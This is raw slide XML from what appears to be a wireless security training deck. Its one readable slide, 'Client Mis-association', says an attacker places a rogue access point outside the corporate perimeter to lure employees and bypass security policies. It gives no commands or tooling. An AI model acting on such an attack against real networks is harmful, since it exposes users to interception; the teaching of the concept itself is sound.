      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143331112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Placeholder 5" descr="A person typing on a keyboard&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F1A7CBE-9A22-4DB4-9FF1-A8A30BCB9E39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 cstate="print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720" b="9720"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6584196"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72288C8E-EB08-4B3B-BD95-133BDFDD5D9B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141413" y="158750"/>
            <a:ext cx="9909175" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p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Client Mis-association</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Rectangle 245"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5875973" y="4648200"/>
            <a:ext cx="5049202" cy="83099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Attacker sets up a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rogue AP outside the corporate perimeter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and lures the employees of the organization to connect with it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1035" name="Rectangle 1034"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5875973" y="5692806"/>
            <a:ext cx="5008996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Once associated, attackers may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bypass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the enterprise security policies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="233" name="Straight Connector 232"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="240" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2631182" y="3582518"/>
            <a:ext cx="2671002" cy="1155316"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:headEnd type="arrow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" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B40E36-4060-41DE-B910-9B718E428CB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="1234226"/>
            <a:ext cx="10045642" cy="5165883"/>
            <a:chOff x="977535" y="1234226"/>
            <a:chExt cx="10045642" cy="5165883"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 1149"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3776433" y="3210588"/>
              <a:ext cx="592138" cy="177800"/>
              <a:chOff x="3223" y="3645"/>
              <a:chExt cx="373" cy="112"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Freeform 1150"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3330" y="3645"/>
                <a:ext cx="53" cy="2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7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="446" y="217"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="446" y="120"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="0"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="446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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="12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1">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Freeform 1151"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3223" y="3645"/>
                <a:ext cx="373" cy="100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="2887" y="54"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="898" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="1344" y="120"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="482"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="1344" y="843"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="2688" y="482"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="3137" y="602"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="2887" y="54"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3137" h="843">
                    <a:moveTo>
                      <a:pt x="2887" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="898" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3137" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2887" y="54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1">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Freeform 1152"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3223" y="3702"/>
                <a:ext cx="160" cy="5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7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="1344" y="458"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="1344" y="361"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="0"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1344" h="458">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="361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2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Freeform 1153"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3543" y="3702"/>
                <a:ext cx="53" cy="2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7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="449" y="217"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="449" y="120"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="0"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="449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9" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="12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1">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Freeform 1154"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3383" y="3702"/>
                <a:ext cx="160" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="0" y="458"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="361"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="1344" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="1344" y="97"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="458"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1344" h="458">
                    <a:moveTo>
                      <a:pt x="0" y="458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458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1">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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15" name="Group 16689"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="8775403" y="2348884"/>
              <a:ext cx="539750" cy="157162"/>
              <a:chOff x="2417" y="2500"/>
              <a:chExt cx="508" cy="148"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="Freeform 16690"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2426" y="2500"/>
                <a:ext cx="499" cy="135"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="196" y="773"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="239"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="446" y="359"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="1790" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="3134" y="359"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="1790" y="721"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="2239" y="841"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="196" y="773"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3134" h="841">
                    <a:moveTo>
                      <a:pt x="196" y="773"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3134" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="77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C7013">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="4C7013"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Freeform 16691"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2885" y="2537"/>
                <a:ext cx="31" cy="10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7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="196" y="630"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="196" y="534"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="0"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="196" h="630">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="534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C7013">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="4C7013"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Freeform 16692"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2417" y="2557"/>
                <a:ext cx="214" cy="73"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="1344" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="1344" y="95"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="456"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="362"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="1344" y="0"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1344" h="456">
                    <a:moveTo>
                      <a:pt x="1344" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="4C7013"/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sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Freeform 16693"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2562" y="2623"/>
                <a:ext cx="326" cy="25"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="2043" y="163"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="2043" y="68"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="96"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="2043" y="163"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="2043" h="163">
                    <a:moveTo>
                      <a:pt x="2043" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2043" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2043" y="16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C7013">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="4C7013"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Freeform 16347"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7622791" y="1865248"/>
              <a:ext cx="2063750" cy="555625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4C7013">
                    <a:gamma/>
                    <a:tint val="68627"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="4C7013"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="bg1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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 16365"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="7843454" y="1893823"/>
              <a:ext cx="1593850" cy="460375"/>
              <a:chOff x="2158" y="2963"/>
              <a:chExt cx="3583" cy="1038"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="Freeform 16366"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="2963"/>
                <a:ext cx="3583" cy="962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 601 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 360 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 601 h 9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83"/>
                  <a:gd name="T16" fmla="*/ 0 h 962"/>
                  <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T18" fmla="*/ 962 h 9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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="601"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="601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3" name="Freeform 16367"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3502" y="3323"/>
                <a:ext cx="2239" cy="678"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 602 h 678"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 678"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 75 h 678"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 678 h 678"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 602 h 6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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 678"/>
                  <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T18" fmla="*/ 678 h 6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9" h="678">
                    <a:moveTo>
                      <a:pt x="0" y="602"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="602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" name="Freeform 16368"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="3564"/>
                <a:ext cx="1344" cy="437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 437"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 437"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 437 h 437"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 75 h 437"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 437"/>
                  <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T18" fmla="*/ 437 h 4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4" h="437">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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5" name="Oval 16369"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2900" y="3679"/>
                <a:ext cx="170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" name="Oval 16370"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3145" y="3613"/>
                <a:ext cx="170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" name="Oval 16371"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3389" y="3547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8" name="Oval 16372"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3634" y="3481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9" name="Oval 16373"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3877" y="3417"/>
                <a:ext cx="173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0" name="Oval 16374"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4123" y="3351"/>
                <a:ext cx="173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1" name="Oval 16375"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4366" y="3285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2" name="Oval 16376"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4612" y="3219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3" name="Oval 16377"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4858" y="3155"/>
                <a:ext cx="170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34" name="Group 13097"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="9019791" y="2033523"/>
              <a:ext cx="330200" cy="222250"/>
              <a:chOff x="5427" y="1926"/>
              <a:chExt cx="1222" cy="842"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="Freeform 13098"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5706" y="2485"/>
                <a:ext cx="338" cy="129"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1739"/>
                  <a:gd name="T1" fmla="*/ 0 h 664"/>
                  <a:gd name="T2" fmla="*/ 0 w 1739"/>
                  <a:gd name="T3" fmla="*/ 198 h 664"/>
                  <a:gd name="T4" fmla="*/ 1739 w 1739"/>
                  <a:gd name="T5" fmla="*/ 664 h 664"/>
                  <a:gd name="T6" fmla="*/ 1739 w 1739"/>
                  <a:gd name="T7" fmla="*/ 465 h 664"/>
                  <a:gd name="T8" fmla="*/ 0 w 1739"/>
                  <a:gd name="T9" fmla="*/ 0 h 6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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 664"/>
                  <a:gd name="T17" fmla="*/ 1739 w 1739"/>
                  <a:gd name="T18" fmla="*/ 664 h 66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9" h="664">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1739" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1739" y="46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" name="Freeform 13099"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5706" y="2438"/>
                <a:ext cx="512" cy="137"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1739 w 2634"/>
                  <a:gd name="T1" fmla="*/ 227 h 706"/>
                  <a:gd name="T2" fmla="*/ 896 w 2634"/>
                  <a:gd name="T3" fmla="*/ 0 h 706"/>
                  <a:gd name="T4" fmla="*/ 0 w 2634"/>
                  <a:gd name="T5" fmla="*/ 241 h 706"/>
                  <a:gd name="T6" fmla="*/ 841 w 2634"/>
                  <a:gd name="T7" fmla="*/ 468 h 706"/>
                  <a:gd name="T8" fmla="*/ 841 w 2634"/>
                  <a:gd name="T9" fmla="*/ 468 h 706"/>
                  <a:gd name="T10" fmla="*/ 1739 w 2634"/>
                  <a:gd name="T11" fmla="*/ 706 h 706"/>
